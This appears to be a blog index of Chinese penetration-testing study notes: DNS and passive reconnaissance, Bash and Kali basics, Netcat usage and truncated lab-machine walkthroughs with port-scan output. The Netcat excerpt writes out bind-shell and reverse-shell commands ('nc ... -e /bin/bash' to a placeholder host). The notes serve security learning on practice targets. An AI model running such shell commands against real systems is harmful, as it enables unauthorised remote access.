🎐清风.

# DNS 信息收集 使用 host 命令可以搜索 IP 地址 还有一些其他的参数 当然，以下是一个简单的表格，列出了 host 命令的使用和各种参数： 用途 命令示例 查询主机名对应的 IP 地址 host example.com 查询 IP 地址对应的主机名 host 192.168.1.1 指定查询的 DNS 服务器 host example.com dns_server_ip 查询指定类型的记录（如 MX 记录、NS 记录等） host -t mx example.com 指定查询的协议类型（如 IPv4 或 IPv6） host -4...

界定：不与目标系统产生任何联系，或者仅作为正常用户进行交互 通过浏览网站，获取信息 企业邮箱 + 社交账号 whois 信息，查找注册人等信息。whois 支持反向查找，使用 ip 进行搜索。 Google Hacking，不多讲 ==、 https://www.netcraft.com https://searchdns.netcraft.com https://sitereport.netcraft.com/?url= recon-ng 进行被动信息收集，可能需要 api_key 进行，工具的使用可能还需要翻墙，感觉国内不友好。 github、gitlab、sourceforge...

bash 是一个包含一系列命令的纯文本文件，通常以 .sh 结尾，执行前必须有可执行权限。 # 变量 跟编程很像，声明直接声明 A=SB ，调用的时候加一个 $ 就行： echo '我是$A' 声明的变脸如果有空格，要用引号包起来 可以通过 $() 执行命令： user=$(whoami) ，这样运行 echo $user 会直接显示用户名 # 参数 在 Bash 编程中，你可以通过使用特定的变量来获取传递给脚本或函数的参数。这些特定的变量是： $0：表示脚本或函数的名称。 $1, $2, $3, ...：表示传递给脚本或函数的位置参数，其中 $1 表示第一个参数，$2...

# Netcat 很牛逼的工具，可以创建 TCP 或 UDP 的连接，同时可以是服务端也可以是客户端。 -n 跳过 dns 解析 -v 显示详情 -l 监听 -p 指定端口 可以使用重定向符号进行传文件的传递 -e 可以指定执行程序，并重定向输入输出到这个程序上，如: nc -lnvp 4444 -e cmd.exe ，然后使用 nc 连这个端口就能拿到 shell 当然上面那个是监听端启动 shell，也可以建立最常用的反向连接： nc -nv X.X.X.X 4444 -e /bin/bash # socat 用法： socat - TCP4:X.X.X.X:110 ，建立 110...

# 环境变量 Bash 是一种 shell，结合了 corn shell 和 seashell 的。 环境变量： $PATH 、 $NAME 、 $PWD 、 HOME$ 。 可以使用 export 定义一个环境变量，这样可以快速在当前 shell 和子 shell 中使用变量。如果不使用 export 导出，那么定义的变量只能在当前 shell 中使用。 可以通过 env 查看环境变量信息 # 历史命令 多的不赘述 按下 Ctrl + r 可以启用搜索功能，通过键入字符找到最近的相似命令，回车进行执行。 #...

最好使用 x64，确保一致性 创建后即时 passwd 修改密码 建议使用 kali 账户，使用 root 虽然方便但容易导致系统受损。使用 sodu 执行管理员权限。 预装了各种工具，坏蛋时间浏览菜单，帮助认识结构和工具。 关注 kali 官方文档和论坛，用来排除故障，工具站可以查询和定制工具。有时间可以看看。官网有使用手册和培训。网站的信息在 kali 的浏览器的收藏栏里。 简单介绍了一下目录结构。和 Linux 很像。 提供用户手册 man ， -k 参数可以更快速地定位需要查找的内容 ls 的使用，讲了可以使用通配符和 - al 参数 cd 的使用，还有 pwd find 、...

# 靶场搭建 下载，导入，开箱即食。 IP: 192.168.1.130 # 渗透测试 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 6.7p1 Ubuntu 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 1024 cb:47:92:da:ea:b8:d3:82:16:22:0d:a5:5f:05:47:51 (DSA)| 2048 fd:93:9d:28:57:fb:ef:e0:8e:f1:93:66:03:67:35:50 (RSA)| 256...

# 靶机搭建 直接打开，导入，修改网卡为 NAT 模式 IP 地址： 192.168.174.131 # 渗透过程 # 信息初收集 21/tcp open ftp 22/tcp open ssh 80/tcp open http 使用 ftp 用户登录 ftp 看看，有一个用户列表的备份文件 21/tcp open ftp22/tcp open ssh80/tcp open http```plainabatchyjohnmaiannedoomguyabatchyjohnmaiannedoomguy扫描路径发现存在 robots.txt，打开后发现一个敏感目录...

# 靶场搭建 下载直接导入，设置成 NAT 模式，就能用了 IP： 192.168.1.128 # 渗透过程 # 信息初收集 33447/tcp open http Apache httpd 2.4.10 ((Ubuntu))只有一个端口，web 服务，那就说明你懂得 打开 web 服务端先 F12 看到提示 <!--0x643239334c6d70775a773d3d--> 16 进制转字符，base64 解码得到 wow.jpg ，访问毛都没有啊 dirsearch 扫到了 images，再加上 wow.jpg ，出来个吊图，binwalk 了一下也没问题啊...

# 靶场搭建 下载导入，直接启动就能用。 IP： 192.168.1.138 # 渗透过程 # 信息初收集 80 端口的 CMS 是 CMS Made Simple 2.2.15 。有 RCE 可以利用的，但是需要登录。 查看网站上的信息有两个用户 qiu 和 patrick 。提示了 backdoor 后门，就是那个 RCE 应该。 22/tcp open ssh80/tcp open http111/tcp closed rpcbind139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds3306/tcp...